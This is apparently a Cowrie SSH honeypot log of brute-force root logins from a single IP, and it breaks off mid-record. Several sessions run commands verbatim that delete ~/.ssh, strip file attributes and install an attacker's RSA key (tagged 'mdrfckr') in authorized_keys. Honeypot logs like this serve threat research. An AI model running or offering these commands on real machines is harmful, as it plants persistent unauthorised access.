{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:21.953664Z","src_ip":"212.227.235.229","session":"968d16f20c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:22.938050Z","src_ip":"212.227.235.229","session":"968d16f20c4d"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:23.173922Z","src_ip":"212.227.235.229","session":"ac18ece0af03"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:23.174996Z","src_ip":"212.227.235.229","session":"968d16f20c4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47490,"dst_ip":"1.2.3.4","dst_port":22,"session":"f14c6711e2b4","protocol":"ssh","message":"New connection: 212.227.235.229:47490 (1.2.3.4:22) [session: f14c6711e2b4]","sensor":"my-vps","timestamp":"2025-09-08T23:09:32.633240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:32.634016Z","src_ip":"212.227.235.229","session":"f14c6711e2b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:32.742897Z","src_ip":"212.227.235.229","session":"f14c6711e2b4"}
{"eventid":"cowrie.login.failed","username":"miner","password":"miner","message":"login attempt [miner/miner] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:33.142391Z","src_ip":"212.227.235.229","session":"f14c6711e2b4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:34.245787Z","src_ip":"212.227.235.229","session":"f14c6711e2b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34128,"dst_ip":"1.2.3.4","dst_port":22,"session":"2157bb06de71","protocol":"ssh","message":"New connection: 212.227.235.229:34128 (1.2.3.4:22) [session: 2157bb06de71]","sensor":"my-vps","timestamp":"2025-09-08T23:09:36.593150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:36.594460Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:36.921186Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:38.267676Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60918,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c6f4363d8ef","protocol":"ssh","message":"New connection: 212.227.235.229:60918 (1.2.3.4:22) [session: 3c6f4363d8ef]","sensor":"my-vps","timestamp":"2025-09-08T23:09:38.782467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:38.783607Z","src_ip":"212.227.235.229","session":"3c6f4363d8ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:38.995173Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:38.996066Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:38.997390Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:39.325196Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:39.995188Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:09:39.995889Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:09:40.324058Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:40.324940Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35814,"dst_ip":"1.2.3.4","dst_port":22,"session":"010b77b6006f","protocol":"ssh","message":"New connection: 212.227.235.229:35814 (1.2.3.4:22) [session: 010b77b6006f]","sensor":"my-vps","timestamp":"2025-09-08T23:09:40.633403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:40.634172Z","src_ip":"212.227.235.229","session":"010b77b6006f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:40.951550Z","src_ip":"212.227.235.229","session":"010b77b6006f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:09:42.263778Z","src_ip":"212.227.235.229","session":"010b77b6006f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:43.582596Z","src_ip":"212.227.235.229","session":"010b77b6006f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36824,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcc6fafc8d39","protocol":"ssh","message":"New connection: 212.227.235.229:36824 (1.2.3.4:22) [session: dcc6fafc8d39]","sensor":"my-vps","timestamp":"2025-09-08T23:09:43.903706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:43.904586Z","src_ip":"212.227.235.229","session":"dcc6fafc8d39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:44.224931Z","src_ip":"212.227.235.229","session":"dcc6fafc8d39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:44.790495Z","src_ip":"212.227.235.229","session":"3c6f4363d8ef"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:44.792325Z","src_ip":"212.227.235.229","session":"3c6f4363d8ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:45.547085Z","src_ip":"212.227.235.229","session":"dcc6fafc8d39"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:45.895028Z","src_ip":"212.227.235.229","session":"dcc6fafc8d39"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:45.899926Z","src_ip":"212.227.235.229","session":"2157bb06de71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54148,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e468efe46a5","protocol":"ssh","message":"New connection: 212.227.235.229:54148 (1.2.3.4:22) [session: 7e468efe46a5]","sensor":"my-vps","timestamp":"2025-09-08T23:09:46.260880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:46.277258Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:09:46.522239Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:09:47.527136Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:48.051328Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:48.052275Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:09:48.053102Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:48.271964Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:09:48.841884Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:09:48.842564Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:09:49.037104Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:09:49.037977Z","src_ip":"212.227.235.229","session":"7e468efe46a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55316,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e78b12678b","protocol":"ssh","message":"New connection: 212.227.235.229:55316 (1.2.3.4:22) [session: f3e78b12678b]","sensor":"my-vps","timestamp":"2025-09-08T23:09:49.261575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:09:49.278629Z","src_ip":"212.227.235.229","session":"f3e78b12678b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","s